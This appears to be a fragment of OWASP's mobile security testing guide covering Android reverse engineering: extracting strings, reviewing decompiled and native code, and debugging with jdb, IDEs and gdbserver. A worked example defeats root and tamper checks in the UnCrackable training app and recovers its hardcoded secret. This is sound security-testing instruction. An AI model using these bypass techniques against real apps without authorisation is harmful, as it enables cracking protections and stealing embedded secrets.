Code analysis is not a quick operation, and not even predictable or taking a linear time to be processed. This makes starting times pretty heavy, compared to just loading the headers and strings information like it\u2019s done by default.
People that are used to IDA or Hopper just load the binary, go out to make a coffee and then when the analysis is done, they start doing the manual analysis to understand what the program is doing. It\u2019s true that those tools perform the analysis in background, and the GUI is not blocked. But this takes a lot of CPU time, and r2 aims to run in many more platforms than just high-end desktop computers.
This said, please see section \"Reviewing Disassembled Native Code\" to learn more bout how radare2 can help us performing our reversing tasks much faster. For example, getting the disassembly of a specific function is a trivial task that can be performed in one command.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0018/#ida-pro","title":"IDA Pro","text":"If you own an IDA Pro license, open the file and once in the \"Load new file\" dialog, choose \"ELF for ARM (Shared Object)\" as the file type (IDA should detect this automatically), and \"ARM Little-Endian\" as the processor type.
The freeware version of IDA Pro unfortunately does not support the ARM processor type.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0019/","title":"Retrieving Strings","text":"While performing any kind of binary analysis, strings can be considered as one of the most valuable starting points as they provide context. For example, an error log string like \"Data encryption failed.\" gives us a hint that the adjoining code might be responsible for performing some kind of encryption operation.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0019/#java-and-kotlin-bytecode","title":"Java and Kotlin Bytecode","text":"As we already know, all the Java and Kotlin bytecode of an Android application is compiled into a DEX file. Each DEX file contains a list of string identifiers (strings_ids), which contains all the string identifiers used in the binary whenever a string is referred, including internal naming (e.g, type descriptors) or constant objects referred by the code (e.g hardcoded strings). You can simply dump this list using tools such as Ghidra (GUI based) or Dextra (CLI based).
With Ghidra, strings can be obtained by simply loading the DEX file and selecting Window -> Defined strings in the menu.
Loading an APK file directly into Ghidra might lead to inconsistencies. Thus it is recommended to extract the DEX file by unzipping the APK file and then loading it into Ghidra.
With Dextra, you can dump all the strings using the following command:
dextra -S classes.dex\n
The output from Dextra can be manipulated using standard Linux commands, for example, using grep
to search for certain keywords.
It is important to know, the list of strings obtained using the above tools can be very big, as it also includes the various class and package names used in the application. Going through the complete list, specially for big binaries, can be very cumbersome. Thus, it is recommended to start with keyword-based searching and go through the list only when keyword search does not help. Some generic keywords which can be a good starting point are - password, key, and secret. Other useful keywords specific to the context of the app can be obtained while you are using the app itself. For instance, imagine that the app has as login form, you can take note of the displayed placeholder or title text of the input fields and use that as an entry point for your static analysis.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0019/#native-code","title":"Native Code","text":"In order to extract strings from native code used in an Android application, you can use GUI tools such as Ghidra or iaito or rely on CLI-based tools such as the strings Unix utility (strings <path_to_binary>
) or radare2's rabin2 (rabin2 -zz <path_to_binary>
). When using the CLI-based ones you can take advantage of other tools such as grep (e.g. in conjunction with regular expressions) to further filter and analyze the results.
There are many RE tools that support retrieving Java cross references. For many of the GUI-based ones, this is usually done by right clicking on the desired function and selecting the corresponding option, e.g. Show References to in Ghidra or Find Usage in jadx.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0020/#native-code","title":"Native Code","text":"Similarly to Java analysis, you can also use Ghidra to analyze native libraries and obtain cross references by right clicking the desired function and selecting Show References to.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0021/","title":"Information Gathering - API Usage","text":"The Android platform provides many in-built libraries for frequently used functionalities in applications, for example cryptography, Bluetooth, NFC, network or location libraries. Determining the presence of these libraries in an application can give us valuable information about its nature.
For instance, if an application is importing javax.crypto.Cipher
, it indicates that the application will be performing some kind of cryptographic operation. Fortunately, cryptographic calls are very standard in nature, i.e, they need to be called in a particular order to work correctly, this knowledge can be helpful when analyzing cryptography APIs. For example, by looking for the Cipher.getInstance
function, we can determine the cryptographic algorithm being used. With such an approach we can directly move to analyzing cryptographic assets, which often are very critical in an application. Further information on how to analyze Android's cryptographic APIs is discussed in the section \"Android Cryptographic APIs\".
Similarly, the above approach can be used to determine where and how an application is using NFC. For instance, an application using Host-based Card Emulation for performing digital payments must use the android.nfc
package. Therefore, a good starting point for NFC API analysis would be to consult the Android Developer Documentation to get some ideas and start searching for critical functions such as processCommandApdu
from the android.nfc.cardemulation.HostApduService
class.
Most of the apps you might encounter connect to remote endpoints. Even before you perform any dynamic analysis (e.g. traffic capture and analysis), you can obtain some initial inputs or entry points by enumerating the domains to which the application is supposed to communicate to.
Typically these domains will be present as strings within the binary of the application. One way to achieve this is by using automated tools such as APKEnum or MobSF. Alternatively, you can grep for the domain names by using regular expressions. For this you can target the app binary directly or reverse engineer it and target the disassembled or decompiled code. The latter option has a clear advantage: it can provide you with context, as you'll be able to see in which context each domain is being used (e.g. class and method).
From here on you can use this information to derive more insights which might be of use later during your analysis, e.g. you could match the domains to the pinned certificates or the Network Security Configuration file or perform further reconnaissance on domain names to know more about the target environment. When evaluating an application it is important to check the Network Security Configuration file, as often (less secure) debug configurations might be pushed into final release builds by mistake.
The implementation and verification of secure connections can be an intricate process and there are numerous aspects to consider. For instance, many applications use other protocols apart from HTTP such as XMPP or plain TCP packets, or perform certificate pinning in an attempt to deter MITM attacks but unfortunately have severe logical bugs in its implementation or an inherently wrong security network configuration.
Remember that in most of the cases, just using static analysis will not be enough and might even turn to be extremely inefficient when compared to the dynamic alternatives which will get much more reliable results (e.g. using an interceptor proxy). In this section we've just slightly touched the surface, please refer to the section \"Basic Network Monitoring/Sniffing\" in the \"Android Basic Security Testing\" chapter and also check the test cases in the \"Android Network Communication\" chapter.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0023/","title":"Reviewing Decompiled Java Code","text":"Following the example from \"Decompiling Java Code\", we assume that you've successfully decompiled and opened the UnCrackable App for Android Level 1 in IntelliJ. As soon as IntelliJ has indexed the code, you can browse it just like you'd browse any other Java project. Note that many of the decompiled packages, classes, and methods have weird one-letter names; this is because the bytecode has been \"minified\" with ProGuard at build time. This is a basic type of obfuscation that makes the bytecode a little more difficult to read, but with a fairly simple app like this one, it won't cause you much of a headache. When you're analyzing a more complex app, however, it can get quite annoying.
When analyzing obfuscated code, annotating class names, method names, and other identifiers as you go along is a good practice. Open the MainActivity
class in the package sg.vantagepoint.uncrackable1
. The method verify
is called when you tap the \"verify\" button. This method passes the user input to a static method called a.a
, which returns a boolean value. It seems plausible that a.a
verifies user input, so we'll refactor the code to reflect this.
Right-click the class name (the first a
in a.a
) and select Refactor -> Rename from the drop-down menu (or press Shift-F6). Change the class name to something that makes more sense given what you know about the class so far. For example, you could call it \"Validator\" (you can always revise the name later). a.a
now becomes Validator.a
. Follow the same procedure to rename the static method a
to check_input
.
Congratulations, you just learned the fundamentals of static analysis! It is all about theorizing, annotating, and gradually revising theories about the analyzed program until you understand it completely or, at least, well enough for whatever you want to achieve.
Next, Ctrl+click (or Command+click on Mac) on the check_input
method. This takes you to the method definition. The decompiled method looks like this:
public static boolean check_input(String string) {\n byte[] arrby = Base64.decode((String) \\\n \"5UJiFctbmgbDoLXmpL12mkno8HT4Lv8dlat8FxR2GOc=\", (int)0);\n byte[] arrby2 = new byte[]{};\n try {\n arrby = sg.vantagepoint.a.a.a(Validator.b(\"8d127684cbc37c17616d806cf50473cc\"), arrby);\n arrby2 = arrby;\n }sa\n catch (Exception exception) {\n Log.d((String)\"CodeCheck\", (String)(\"AES error:\" + exception.getMessage()));\n }\n if (string.equals(new String(arrby2))) {\n return true;\n }\n return false;\n }\n
So, you have a Base64-encoded String that's passed to the function a
in the package \\ sg.vantagepoint.a.a
(again, everything is called a
) along with something that looks suspiciously like a hex-encoded encryption key (16 hex bytes = 128bit, a common key length). What exactly does this particular a
do? Ctrl-click it to find out.
public class a {\n public static byte[] a(byte[] object, byte[] arrby) {\n object = new SecretKeySpec((byte[])object, \"AES/ECB/PKCS7Padding\");\n Cipher cipher = Cipher.getInstance(\"AES\");\n cipher.init(2, (Key)object);\n return cipher.doFinal(arrby);\n }\n}\n
Now you're getting somewhere: it's simply standard AES-ECB. Looks like the Base64 string stored in arrby1
in check_input
is a ciphertext. It is decrypted with 128bit AES, then compared with the user input. As a bonus task, try to decrypt the extracted ciphertext and find the secret value!
A faster way to get the decrypted string is to add dynamic analysis. We'll revisit UnCrackable App for Android Level 1 later to show how (e.g. in the Debugging section), so don't delete the project yet!
"},{"location":"MASTG/techniques/android/MASTG-TECH-0024/","title":"Reviewing Disassembled Native Code","text":"Following the example from \"Disassembling Native Code\" we will use different disassemblers to review the disassembled native code.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0024/#radare2","title":"radare2","text":"Once you've opened your file in radare2 you should first get the address of the function you're looking for. You can do this by listing or getting information i
about the symbols s
(is
) and grepping (~
radare2's built-in grep) for some keyword, in our case we're looking for JNI related symbols so we enter \"Java\":
$ r2 -A HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so\n...\n[0x00000e3c]> is~Java\n003 0x00000e78 0x00000e78 GLOBAL FUNC 16 Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI\n
The method can be found at address 0x00000e78
. To display its disassembly simply run the following commands:
[0x00000e3c]> e emu.str=true;\n[0x00000e3c]> s 0x00000e78\n[0x00000e78]> af\n[0x00000e78]> pdf\n\u256d (fcn) sym.Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI 12\n\u2502 sym.Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI (int32_t arg1);\n\u2502 ; arg int32_t arg1 @ r0\n\u2502 0x00000e78 ~ 0268 ldr r2, [r0] ; arg1\n\u2502 ;-- aav.0x00000e79:\n\u2502 ; UNKNOWN XREF from aav.0x00000189 (+0x3)\n\u2502 0x00000e79 unaligned\n\u2502 0x00000e7a 0249 ldr r1, aav.0x00000f3c ; [0xe84:4]=0xf3c aav.0x00000f3c\n\u2502 0x00000e7c d2f89c22 ldr.w r2, [r2, 0x29c]\n\u2502 0x00000e80 7944 add r1, pc ; \"Hello from C++\" section..rodata\n\u2570 0x00000e82 1047 bx r2\n
Let's explain the previous commands:
e emu.str=true;
enables radare2's string emulation. Thanks to this, we can see the string we're looking for (\"Hello from C++\").s 0x00000e78
is a seek to the address s 0x00000e78
, where our target function is located. We do this so that the following commands apply to this address.pdf
means print disassembly of function.Using radare2 you can quickly run commands and exit by using the flags -qc '<commands>'
. From the previous steps we know already what to do so we will simply put everything together:
$ r2 -qc 'e emu.str=true; s 0x00000e78; af; pdf' HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so\n\n\u256d (fcn) sym.Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI 12\n\u2502 sym.Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI (int32_t arg1);\n\u2502 ; arg int32_t arg1 @ r0\n\u2502 0x00000e78 0268 ldr r2, [r0] ; arg1\n\u2502 0x00000e7a 0249 ldr r1, [0x00000e84] ; [0xe84:4]=0xf3c\n\u2502 0x00000e7c d2f89c22 ldr.w r2, [r2, 0x29c]\n\u2502 0x00000e80 7944 add r1, pc ; \"Hello from C++\" section..rodata\n\u2570 0x00000e82 1047 bx r2\n
Notice that in this case we're not starting with the -A
flag not running aaa
. Instead, we just tell radare2 to analyze that one function by using the analyze function af
command. This is one of those cases where we can speed up our workflow because you're focusing on some specific part of an app.
The workflow can be further improved by using r2ghidra, a deep integration of Ghidra decompiler for radare2. r2ghidra generates decompiled C code, which can aid in quickly analyzing the binary.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0024/#ida-pro","title":"IDA Pro","text":"We assume that you've successfully opened lib/armeabi-v7a/libnative-lib.so
in IDA pro. Once the file is loaded, click into the \"Functions\" window on the left and press Alt+t
to open the search dialog. Enter \"java\" and hit enter. This should highlight the Java_sg_vantagepoint_helloworld_ MainActivity_stringFromJNI
function. Double-click the function to jump to its address in the disassembly Window. \"Ida View-A\" should now show the disassembly of the function.
Not a lot of code there, but you should analyze it. The first thing you need to know is that the first argument passed to every JNI function is a JNI interface pointer. An interface pointer is a pointer to a pointer. This pointer points to a function table: an array of even more pointers, each of which points to a JNI interface function (is your head spinning yet?). The function table is initialized by the Java VM and allows the native function to interact with the Java environment.
With that in mind, let's have a look at each line of assembly code.
LDR R2, [R0]\n
Remember: the first argument (in R0) is a pointer to the JNI function table pointer. The LDR
instruction loads this function table pointer into R2.
LDR R1, =aHelloFromC\n
This instruction loads into R1 the PC-relative offset of the string \"Hello from C++\". Note that this string comes directly after the end of the function block at offset 0xe84. Addressing relative to the program counter allows the code to run independently of its position in memory.
LDR.W R2, [R2, #0x29C]\n
This instruction loads the function pointer from offset 0x29C into the JNI function pointer table pointed to by R2. This is the NewStringUTF
function. You can look at the list of function pointers in jni.h, which is included in the Android NDK. The function prototype looks like this:
jstring (*NewStringUTF)(JNIEnv*, const char*);\n
The function takes two arguments: the JNIEnv pointer (already in R0) and a String pointer. Next, the current value of PC is added to R1, resulting in the absolute address of the static string \"Hello from C++\" (PC + offset).
ADD R1, PC\n
Finally, the program executes a branch instruction to the NewStringUTF
function pointer loaded into R2:
BX R2\n
When this function returns, R0 contains a pointer to the newly constructed UTF string. This is the final return value, so R0 is left unchanged and the function returns.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0024/#ghidra","title":"Ghidra","text":"After opening the library in Ghidra we can see all the functions defined in the Symbol Tree panel under Functions. The native library for the current application is relatively very small. There are three user defined functions: FUN_001004d0
, FUN_0010051c
, and Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI
. The other symbols are not user defined and are generated for proper functioning of the shared library. The instructions in the function Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI
are already discussed in detail in previous sections. In this section we can look into the decompilation of the function.
Inside the current function there is a call to another function, whose address is obtained by accessing an offset in the JNIEnv
pointer (found as plParm1
). This logic has been diagrammatically demonstrated above as well. The corresponding C code for the disassembled function is shown in the Decompiler window. This decompiled C code makes it much easier to understand the function call being made. Since this function is small and extremely simple, the decompilation output is very accurate, this can change drastically when dealing with complex functions.
You should use tools for efficient static analysis. They allow the tester to focus on the more complicated business logic. A plethora of static code analyzers are available, ranging from open source scanners to full-blown enterprise-ready scanners. The best tool for the job depends on budget, client requirements, and the tester's preferences.
Some static analyzers rely on the availability of the source code; others take the compiled APK as input. Keep in mind that static analyzers may not be able to find all problems by themselves even though they can help us focus on potential problems. Review each finding carefully and try to understand what the app is doing to improve your chances of finding vulnerabilities.
Configure the static analyzer properly to reduce the likelihood of false positives and maybe only select several vulnerability categories in the scan. The results generated by static analyzers can otherwise be overwhelming, and your efforts can be counterproductive if you must manually investigate a large report.
There are several open source tools for automated security analysis of an APK.
Non-rooted devices have the benefit of replicating an environment that the application is intended to run on.
Thanks to tools like objection, you can patch the app in order to test it like if you were on a rooted device (but of course being jailed to that one app). To do that you have to perform one additional step: patch the APK to include the Frida gadget library.
Now you can use objection to dynamically analyze the application on non-rooted devices.
The following commands summarize how to patch and start dynamic analysis using objection using the UnCrackable App for Android Level 1 as an example:
# Download the Uncrackable APK\n$ wget https://raw.githubusercontent.com/OWASP/owasp-mastg/master/Crackmes/Android/Level_01/UnCrackable-Level1.apk\n# Patch the APK with the Frida Gadget\n$ objection patchapk --source UnCrackable-Level1.apk\n# Install the patched APK on the android phone\n$ adb install UnCrackable-Level1.objection.apk\n# After running the mobile phone, objection will detect the running frida-server through the APK\n$ objection explore\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0027/","title":"Get Open Files","text":"You can use lsof
with the flag -p <pid>
to return the list of open files for the specified process. See the man page for more options.
# lsof -p 6233\nCOMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME\n.foobar.c 6233 u0_a97 cwd DIR 0,1 0 1 /\n.foobar.c 6233 u0_a97 rtd DIR 0,1 0 1 /\n.foobar.c 6233 u0_a97 txt REG 259,11 23968 399 /system/bin/app_process64\n.foobar.c 6233 u0_a97 mem unknown /dev/ashmem/dalvik-main space (region space) (deleted)\n.foobar.c 6233 u0_a97 mem REG 253,0 2797568 1146914 /data/dalvik-cache/arm64/system@framework@boot.art\n.foobar.c 6233 u0_a97 mem REG 253,0 1081344 1146915 /data/dalvik-cache/arm64/system@framework@boot-core-libart.art\n...\n
In the above output, the most relevant fields for us are:
NAME
: path of the file.TYPE
: type of the file, for example, file is a directory or a regular file.This can be extremely useful to spot unusual files when monitoring applications using obfuscation or other anti-reverse engineering techniques, without having to reverse the code. For instance, an application might be performing encryption-decryption of data and storing it in a file temporarily.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0028/","title":"Get Open Connections","text":"You can find system-wide networking information in /proc/net
or just by inspecting the /proc/<pid>/net
directories (for some reason not process specific). There are multiple files present in these directories, of which tcp
, tcp6
and udp
might be considered relevant from the tester's perspective.
# cat /proc/7254/net/tcp\nsl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode\n...\n69: 1101A8C0:BB2F 9A447D4A:01BB 01 00000000:00000000 00:00000000 00000000 10093 0 75412 1 0000000000000000 20 3 19 10 -1\n70: 1101A8C0:917C E3CB3AD8:01BB 01 00000000:00000000 00:00000000 00000000 10093 0 75553 1 0000000000000000 20 3 23 10 -1\n71: 1101A8C0:C1E3 9C187D4A:01BB 01 00000000:00000000 00:00000000 00000000 10093 0 75458 1 0000000000000000 20 3 19 10 -1\n...\n
In the output above, the most relevant fields for us are:
rem_address
: remote address and port number pair (in hexadecimal representation).tx_queue
and rx_queue
: the outgoing and incoming data queue in terms of kernel memory usage. These fields give an indication how actively the connection is being used.uid
: containing the effective UID of the creator of the socket.Another alternative is to use the netstat
command, which also provides information about the network activity for the complete system in a more readable format, and can be easily filtered as per our requirements. For instance, we can easily filter it by PID:
# netstat -p | grep 24685\nActive Internet connections (w/o servers)\nProto Recv-Q Send-Q Local Address Foreign Address State PID/Program Name\ntcp 0 0 192.168.1.17:47368 172.217.194.103:https CLOSE_WAIT 24685/com.google.android.youtube\ntcp 0 0 192.168.1.17:47233 172.217.194.94:https CLOSE_WAIT 24685/com.google.android.youtube\ntcp 0 0 192.168.1.17:38480 sc-in-f100.1e100.:https ESTABLISHED 24685/com.google.android.youtube\ntcp 0 0 192.168.1.17:44833 74.125.24.91:https ESTABLISHED 24685/com.google.android.youtube\ntcp 0 0 192.168.1.17:38481 sc-in-f100.1e100.:https ESTABLISHED 24685/com.google.android.youtube\n...\n
netstat
output is clearly more user friendly than reading /proc/<pid>/net
. The most relevant fields for us, similar to the previous output, are following:
Foreign Address
: remote address and port number pair (port number can be replaced with the well-known name of a protocol associated with the port).Recv-Q
and Send-Q
: Statistics related to receive and send queue. Gives an indication on how actively the connection is being used.State
: the state of a socket, for example, if the socket is in active use (ESTABLISHED
) or closed (CLOSED
).The file /proc/<pid>/maps
contains the currently mapped memory regions and their access permissions. Using this file we can get the list of the libraries loaded in the process.
# cat /proc/9568/maps\n12c00000-52c00000 rw-p 00000000 00:04 14917 /dev/ashmem/dalvik-main space (region space) (deleted)\n6f019000-6f2c0000 rw-p 00000000 fd:00 1146914 /data/dalvik-cache/arm64/system@framework@boot.art\n...\n7327670000-7329747000 r--p 00000000 fd:00 1884627 /data/app/com.google.android.gms-4FJbDh-oZv-5bCw39jkIMQ==/oat/arm64/base.odex\n..\n733494d000-7334cfb000 r-xp 00000000 fd:00 1884542 /data/app/com.google.android.youtube-Rl_hl9LptFQf3Vf-JJReGw==/lib/arm64/libcronet.80.0.3970.3.so\n...\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0029/#using-frida","title":"Using Frida","text":"You can retrieve process related information straight from the Frida CLI by using the Process
command. Within the Process
command the function enumerateModules
lists the libraries loaded into the process memory.
[Huawei Nexus 6P::sg.vantagepoint.helloworldjni]-> Process.enumerateModules()\n[\n {\n \"base\": \"0x558a442000\",\n \"name\": \"app_process64\",\n \"path\": \"/system/bin/app_process64\",\n \"size\": 32768\n },\n {\n \"base\": \"0x78bc984000\",\n \"name\": \"libandroid_runtime.so\",\n \"path\": \"/system/lib64/libandroid_runtime.so\",\n \"size\": 2011136\n },\n...\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0030/","title":"Sandbox Inspection","text":"The application data is stored in a sandboxed directory present at /data/data/<app_package_name>
. The content of this directory has already been discussed in detail in the \"Accessing App Data Directories\" section.
So far, you've been using static analysis techniques without running the target apps. In the real world, especially when reversing malware or more complex apps, pure static analysis is very difficult. Observing and manipulating an app during runtime makes it much, much easier to decipher its behavior. Next, we'll have a look at dynamic analysis methods that help you do just that.
Android apps support two different types of debugging: Debugging on the level of the Java runtime with the Java Debug Wire Protocol (JDWP), and Linux/Unix-style ptrace-based debugging on the native layer, both of which are valuable to reverse engineers.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0031/#debugging-release-apps","title":"Debugging Release Apps","text":"Dalvik and ART support the JDWP, a protocol for communication between the debugger and the Java virtual machine (VM) that it debugs. JDWP is a standard debugging protocol that's supported by all command line tools and Java IDEs, including jdb, IntelliJ, and Eclipse. Android's implementation of JDWP also includes hooks for supporting extra features implemented by the Dalvik Debug Monitor Server (DDMS).
A JDWP debugger allows you to step through Java code, set breakpoints on Java methods, and inspect and modify local and instance variables. You'll use a JDWP debugger most of the time you debug \"normal\" Android apps (i.e., apps that don't make many calls to native libraries).
In the following section, we'll show how to solve the UnCrackable App for Android Level 1 with jdb alone. Note that this is not an efficient way to solve this crackme. Actually you can do it much faster with Frida and other methods, which we'll introduce later in the guide. This, however, serves as an introduction to the capabilities of the Java debugger.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0031/#debugging-with-jdb","title":"Debugging with jdb","text":"The adb
command line tool was introduced in the \"Android Basic Security Testing\" chapter. You can use its adb jdwp
command to list the process IDs of all debuggable processes running on the connected device (i.e., processes hosting a JDWP transport). With the adb forward
command, you can open a listening socket on your host computer and forward this socket's incoming TCP connections to the JDWP transport of a chosen process.
$ adb jdwp\n12167\n$ adb forward tcp:7777 jdwp:12167\n
You're now ready to attach jdb. Attaching the debugger, however, causes the app to resume, which you don't want. You want to keep it suspended so that you can explore first. To prevent the process from resuming, pipe the suspend
command into jdb:
$ { echo \"suspend\"; cat; } | jdb -attach localhost:7777\nInitializing jdb ...\n> All threads suspended.\n>\n
You're now attached to the suspended process and ready to go ahead with the jdb commands. Entering ?
prints the complete list of commands. Unfortunately, the Android VM doesn't support all available JDWP features. For example, the redefine
command, which would let you redefine a class code is not supported. Another important restriction is that line breakpoints won't work because the release bytecode doesn't contain line information. Method breakpoints do work, however. Useful working commands include:
Let's revisit the decompiled code from the UnCrackable App for Android Level 1 and think about possible solutions. A good approach would be suspending the app in a state where the secret string is held in a variable in plain text so you can retrieve it. Unfortunately, you won't get that far unless you deal with the root/tampering detection first.
Review the code and you'll see that the method sg.vantagepoint.uncrackable1.MainActivity.a
displays the \"This in unacceptable...\" message box. This method creates an AlertDialog
and sets a listener class for the onClick
event. This class (named b
) has a callback method will terminates the app once the user taps the OK button. To prevent the user from simply canceling the dialog, the setCancelable
method is called.
private void a(final String title) {\n final AlertDialog create = new AlertDialog$Builder((Context)this).create();\n create.setTitle((CharSequence)title);\n create.setMessage((CharSequence)\"This in unacceptable. The app is now going to exit.\");\n create.setButton(-3, (CharSequence)\"OK\", (DialogInterface$OnClickListener)new b(this));\n create.setCancelable(false);\n create.show();\n }\n
You can bypass this with a little runtime tampering. With the app still suspended, set a method breakpoint on android.app.Dialog.setCancelable
and resume the app.
> stop in android.app.Dialog.setCancelable\nSet breakpoint android.app.Dialog.setCancelable\n> resume\nAll threads resumed.\n>\nBreakpoint hit: \"thread=main\", android.app.Dialog.setCancelable(), line=1,110 bci=0\nmain[1]\n
The app is now suspended at the first instruction of the setCancelable
method. You can print the arguments passed to setCancelable
with the locals
command (the arguments are shown incorrectly under \"local variables\").
main[1] locals\nMethod arguments:\nLocal variables:\nflag = true\n
setCancelable(true)
was called, so this can't be the call we're looking for. Resume the process with the resume
command.
main[1] resume\nBreakpoint hit: \"thread=main\", android.app.Dialog.setCancelable(), line=1,110 bci=0\nmain[1] locals\nflag = false\n
You've now reached a call to setCancelable
with the argument false
. Set the variable to true
with the set
command and resume.
main[1] set flag = true\n flag = true = true\nmain[1] resume\n
Repeat this process, setting flag
to true
each time the breakpoint is reached, until the alert box is finally displayed (the breakpoint will be reached five or six times). The alert box should now be cancelable! Tap the screen next to the box and it will close without terminating the app.
Now that the anti-tampering is out of the way, you're ready to extract the secret string! In the \"static analysis\" section, you saw that the string is decrypted with AES, then compared with the string input to the message box. The method equals
of the java.lang.String
class compares the string input with the secret string. Set a method breakpoint on java.lang.String.equals
, enter an arbitrary text string in the edit field, and tap the \"verify\" button. Once the breakpoint is reached, you can read the method argument with the locals
command.
> stop in java.lang.String.equals\nSet breakpoint java.lang.String.equals\n>\nBreakpoint hit: \"thread=main\", java.lang.String.equals(), line=639 bci=2\n\nmain[1] locals\nMethod arguments:\nLocal variables:\nother = \"radiusGravity\"\nmain[1] cont\n\nBreakpoint hit: \"thread=main\", java.lang.String.equals(), line=639 bci=2\n\nmain[1] locals\nMethod arguments:\nLocal variables:\nother = \"I want to believe\"\nmain[1] cont\n
This is the plaintext string you're looking for!
"},{"location":"MASTG/techniques/android/MASTG-TECH-0031/#debugging-with-an-ide","title":"Debugging with an IDE","text":"Setting up a project in an IDE with the decompiled sources is a neat trick that allows you to set method breakpoints directly in the source code. In most cases, you should be able to single-step through the app and inspect the state of variables with the GUI. The experience won't be perfect, it's not the original source code after all, so you won't be able to set line breakpoints and things will sometimes simply not work correctly. Then again, reversing code is never easy, and efficiently navigating and debugging plain old Java code is a pretty convenient way of doing it. A similar method has been described in the NetSPI blog.
To set up IDE debugging, first create your Android project in IntelliJ and copy the decompiled Java sources into the source folder as described above in the \"Reviewing Decompiled Java Code\" section. On the device, choose the app as debug app on the \"Developer options\" (UnCrackable App for Android Level 1 in this tutorial), and make sure you've switched on the \"Wait For Debugger\" feature.
Once you tap the app icon from the launcher, it will be suspended in \"Wait For Debugger\" mode.
Now you can set breakpoints and attach to the app process with the \"Attach Debugger\" toolbar button.
Note that only method breakpoints work when debugging an app from decompiled sources. Once a method breakpoint is reached, you'll get the chance to single step during the method execution.
After you choose the app from the list, the debugger will attach to the app process and you'll reach the breakpoint that was set on the onCreate
method. This app triggers anti-debugging and anti-tampering controls within the onCreate
method. That's why setting a breakpoint on the onCreate
method just before the anti-tampering and anti-debugging checks are performed is a good idea.
Next, single-step through the onCreate
method by clicking \"Force Step Into\" in Debugger view. The \"Force Step Into\" option allows you to debug the Android framework functions and core Java classes that are normally ignored by debuggers.
Once you \"Force Step Into\", the debugger will stop at the beginning of the next method, which is the a
method of the class sg.vantagepoint.a.c
.
This method searches for the \"su\" binary within a list of directories (/system/xbin
and others). Since you're running the app on a rooted device/emulator, you need to defeat this check by manipulating variables and/or function return values.
You can see the directory names inside the \"Variables\" window by clicking \"Step Over\" the Debugger view to step into and through the a
method.
Step into the System.getenv
method with the \"Force Step Into\" feature.
After you get the colon-separated directory names, the debugger cursor will return to the beginning of the a
method, not to the next executable line. This happens because you're working on the decompiled code instead of the source code. This skipping makes following the code flow crucial to debugging decompiled applications. Otherwise, identifying the next line to be executed would become complicated.
If you don't want to debug core Java and Android classes, you can step out of the function by clicking \"Step Out\" in the Debugger view. Using \"Force Step Into\" might be a good idea once you reach the decompiled sources and \"Step Out\" of the core Java and Android classes. This will help speed up debugging while you keep an eye on the return values of the core class functions.
After the a
method gets the directory names, it will search for the su
binary within these directories. To defeat this check, step through the detection method and inspect the variable content. Once execution reaches a location where the su
binary would be detected, modify one of the variables holding the file name or directory name by pressing F2 or right-clicking and choosing \"Set Value\".
Once you modify the binary name or the directory name, File.exists
should return false
.
This defeats the first root detection control of the app. The remaining anti-tampering and anti-debugging controls can be defeated in similar ways so that you can finally reach the secret string verification functionality.
The secret code is verified by the method a
of class sg.vantagepoint.uncrackable1.a
. Set a breakpoint on method a
and \"Force Step Into\" when you reach the breakpoint. Then, single-step until you reach the call to String.equals
. This is where user input is compared with the secret string.
You can see the secret string in the \"Variables\" view when you reach the String.equals
method call.
Native code on Android is packed into ELF shared libraries and runs just like any other native Linux program. Consequently, you can debug it with standard tools (including GDB and built-in IDE debuggers such as IDA Pro) as long as they support the device's processor architecture (most devices are based on ARM chipsets, so this is usually not an issue).
You'll now set up your JNI demo app, HelloWorld-JNI.apk, for debugging. It's the same APK you downloaded in \"Statically Analyzing Native Code\". Use adb install
to install it on your device or on an emulator.
adb install HelloWorld-JNI.apk\n
If you followed the instructions at the beginning of this chapter, you should already have the Android NDK. It contains prebuilt versions of gdbserver for various architectures. Copy the gdbserver binary to your device:
adb push $NDK/prebuilt/android-arm/gdbserver/gdbserver /data/local/tmp\n
The gdbserver --attach
command causes gdbserver to attach to the running process and bind to the IP address and port specified in comm
, which in this case is a HOST:PORT descriptor. Start HelloWorldJNI on the device, then connect to the device and determine the PID of the HelloWorldJNI process (sg.vantagepoint.helloworldjni). Then switch to the root user and attach gdbserver
:
$ adb shell\n$ ps | grep helloworld\nu0_a164 12690 201 1533400 51692 ffffffff 00000000 S sg.vantagepoint.helloworldjni\n$ su\n# /data/local/tmp/gdbserver --attach localhost:1234 12690\nAttached; pid = 12690\nListening on port 1234\n
The process is now suspended, and gdbserver
is listening for debugging clients on port 1234
. With the device connected via USB, you can forward this port to a local port on the host with the abd forward
command:
adb forward tcp:1234 tcp:1234\n
You'll now use the prebuilt version of gdb
included in the NDK toolchain.
$ $TOOLCHAIN/bin/gdb libnative-lib.so\nGNU gdb (GDB) 7.11\n(...)\nReading symbols from libnative-lib.so...(no debugging symbols found)...done.\n(gdb) target remote :1234\nRemote debugging using :1234\n0xb6e0f124 in ?? ()\n
You have successfully attached to the process! The only problem is that you're already too late to debug the JNI function StringFromJNI
; it only runs once, at startup. You can solve this problem by activating the \"Wait for Debugger\" option. Go to Developer Options -> Select debug app and pick HelloWorldJNI, then activate the Wait for debugger switch. Then terminate and re-launch the app. It should be suspended automatically.
